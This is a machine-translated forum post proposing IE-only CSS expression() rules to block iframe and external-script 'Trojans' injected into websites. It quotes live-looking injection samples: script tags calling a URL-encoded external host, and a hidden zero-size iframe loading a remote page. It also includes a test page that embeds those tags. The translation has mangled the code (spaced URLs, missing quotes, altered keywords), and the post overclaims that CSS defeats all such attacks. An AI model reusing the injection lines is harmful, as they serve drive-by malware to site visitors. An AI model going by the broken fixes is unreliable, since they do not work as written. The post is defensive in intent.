Author: vickeychen
Source: Classic Forum
It's still a matter of hanging horses. During this period of time, I gradually felt a lot of pressure. I 've been adding more and more people via QQ or MSN, and my work has been very busy recently. Ah, think about it. You still have to take the time to help you.
Not long ago, "a line of code to solve iframe Trojans (including server injection, client ARP injection, etc.)" was recognized by many friends. This is indeed a good way to avoid the storm. But now the network-mounted Trojan method has changed as I expected. Now, Trojans and Trojans are popular, after reading the websites of a few netizens, they are added to the top or bottom of the page:
Note: The following addresses contain Trojans, so do not access them easily:
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
Sweating, inserting N identical <script> tags in a row. Even if any patch is installed on the computer, visit the http: // % 76% 63% 63% 64% 63% 2E % 6E (or directly use thunder to download the patch ~ Now:
Document. write ("<div style = display: none> ")
Document. write ("<iframe src = http://a.158dm.com/b1.htm? Id = 017 width = 0 height = 0> </iframe> ")
Document. write ("</div> ")
Download ghost again with thunder. The charge is quite high!
...
Var Kfqq, Qqs = "784378237"; qwfgsg = "LLLL \ XXXXXLD"; Kfqq = Qqs;
(... Omitted) (there are N statistical JS codes below ).
I can't ignore the above situation. Think of a solution, bro. I drank a bowl of green bean porridge, put a lot of sugar, good to drink. Thought of the solution. The answer is obtained through a slight analysis. Let's take a look at the features of <script> Trojans:
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
By the way, the src of the script Trojan is generally from an external domain, that is, the src is headers with http. If it is a script of your website, http is not required. Then, let's look at the original form of the Trojan, it also outputs iframe, JS Code, or other <object> code, no matter how many, how much to kill.
Let's write CSS with me and solve them one by one. I wrote five different solutions. Let's test them:
Solution 1:
Iframe {n1ifm: expression (this. src = about: blank, this. outerHTML =);}/* this line of code solves the problem of hanging IFRAME Trojans */
Script {nojs1: expression (this. src. toLowerCase (). indexOf (http) = 0 )? Document. write (Trojan is isolated successfully !) :);}
Principle: Convert the <script>-marked src file to lowercase, and check whether it is an external domain JS script file starting with "http". If yes, the page content is cleared and the "Trojan is isolated successfully!" is written! ". Otherwise, it is displayed normally.
Disadvantage: the visitor cannot see the page infected with the <script> Trojan.
Solution 2:
Iframe {nifm2: expression (this. src = about: blank, this. outerHTML = );}
Script {no2js: expression (this. src. toLowerCase (). indexOf (http) = 0 )? Document. close ():);}
Principle: Force disable document. write () of JS files in external domains using document. close. The trojan content has not been written yet. Only some of the content has been forcibly cached and output, and the rest will not be written.
Solution 3:
Iframe {ni3fm: expression (this. src = about: blank, this. outerHTML = );}
Script {n3ojs: expression (this. src. toLowerCase (). indexOf (http) = 0 )? Document.exe cCommand (stop ):);}
Principle: The same as the JS file to the external domain, immediately call the IE private execCommand method to stop all requests on the page, so the subsequent external domain JS file is also forced to stop downloading. Just Like clicking the "stop" button in the browser. It seems that this is a method for JS to simulate the IE stop button.
Solution 4:
Iframe {nif4m: expression (this. src = about: blank, this. outerHTML = );}
Script {noj4s: expression (if (this. src. indexOf (http) = 0) this. src = res: // ieframe. dll/dnserror.htm );}
Principle: overwrite the src of the JS file in the external domain to the address of the IE404 error page. In this way, the JS Code in the external domain will not be downloaded.
Solution 5:
Iframe {nifm5: expression (this. src = about: blank, this. outerHTML = );}
Script {noj5s: expression (this. id. toLowerCase (). indexOf (lh) = 0 )? Document. write (Trojan is isolated successfully !) :));}
In the fifth solution, you must add an id prefixed with "lh" to the page HTML source code <script>, such as lhWeatherJSapi and <script src = "***/**. js "id =" lhSearchJSapi "> </script>
The Code on the following page contains a trojan address, which has been repeated for six times on the page. You can test it using different methods above to see how I study it! (This test is dangerous. Make sure all patches are installed before testing)
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Title> CSS code that allows the JS Trojan process to stop quickly </title>
<Style type = "text/css" id = "LinrStudio">
/* <! [CDATA [*/
Iframe {nhk1: expression (this. src = about: blank, this. outerHTML = );}
Script {ngz1: expression (this. src. indexOf (http) = 0 )? Document. close ():);}
/* Later please pay attention to the latest Trojan processing method: http://www.nihaoku.cn/ff/api.htm */
/*]> */
</Style>
</Head>
<Body>
<Script type = "text/javascript" src = "1.js"> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
<Script src = "http: // % 76% 63% 63% 64% 2E % 63% 6E" type = "text/javascript"> </script>
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I am page 1
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I'm from page 2
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
I am 3 of the page itself
<Script src = http: // % 76% 63% 63% 64% 2E % 63% 6E> </script>
</Body>
</Html>
Among them, 1. js is on its own site:
Document. write ("I Am a JS file on this site ");
Document. write (" ");
My test environment is:
Windows XP SP2 and windows Vista SP1
IE6/IE7/IE8
All Patches have been installed.
In summary, all the current Trojan-mounting methods have been cracked, and CSS can be used to solve all the trojan problems, so that visitors will not be easily poisoned.
You should also take a closer look at the bugs in my code. If you have any bugs, you must discuss them to solve the problem! Or you may have another better way to discuss it.
It's very late. I'm going to bed. Study again when you are free.
Correct Solution 5
The fifth solution code written above is wrong,
<Script src = "****/**. js" id = "lhSearchJSapi"> </script>
Script {noj5s: expression (this. id. toLowerCase (). indexOf (lh) = 0 )? Document. write (Trojan is isolated successfully !) :));}
The red part is incorrect. It should be! =-1, the correct method above should be:
Script {noj5s: expression (this. id. toLowerCase (). indexOf (lh) =-1 )? Document. write (Trojan is isolated successfully !) :));}
Script {noj5s: expression (this. id. toLowerCase (). indexOf (vok )! =-1 )? Document. write (Trojan is isolated successfully !) :));}
[/Code] <script id = "tjJSapivok" title = "this is your JS code for collecting traffic from external domains" type = "text/javascript" src ="Http://js.tongji.yahoo.com.cn/1/188/205/ystat.js> </script>
<Script id = "otherJSapivok" title = "this is the JS file you need on this site" type = "text/javascript" src = "footer. js "> </script> [/code] script {noj5s: expression (this. id. toLowerCase (). indexOf (vok )! =-1 )? Document. write (Trojan is isolated successfully !) :));}
<Script id = "footerJSapivok" src = "Enter the JS path of your website" type = "text/javascript"> </script>
<Script id = "tongjiJSapivok" src = "JS path of the external domain" type = "text/javascript"> </script>
All JS tags on your website (<script>) must be added with the id attribute and have a common prefix, suffix, or public string. The above Public String is "vok ".
I would like to make a correction. I would like to thank the QQ user who gave me a reminder.
The fight against the destruction of users by webpage Trojans continues and will not stop. I also hope you can better configure the server security performance. I am just a temporary solution to avoid the storm.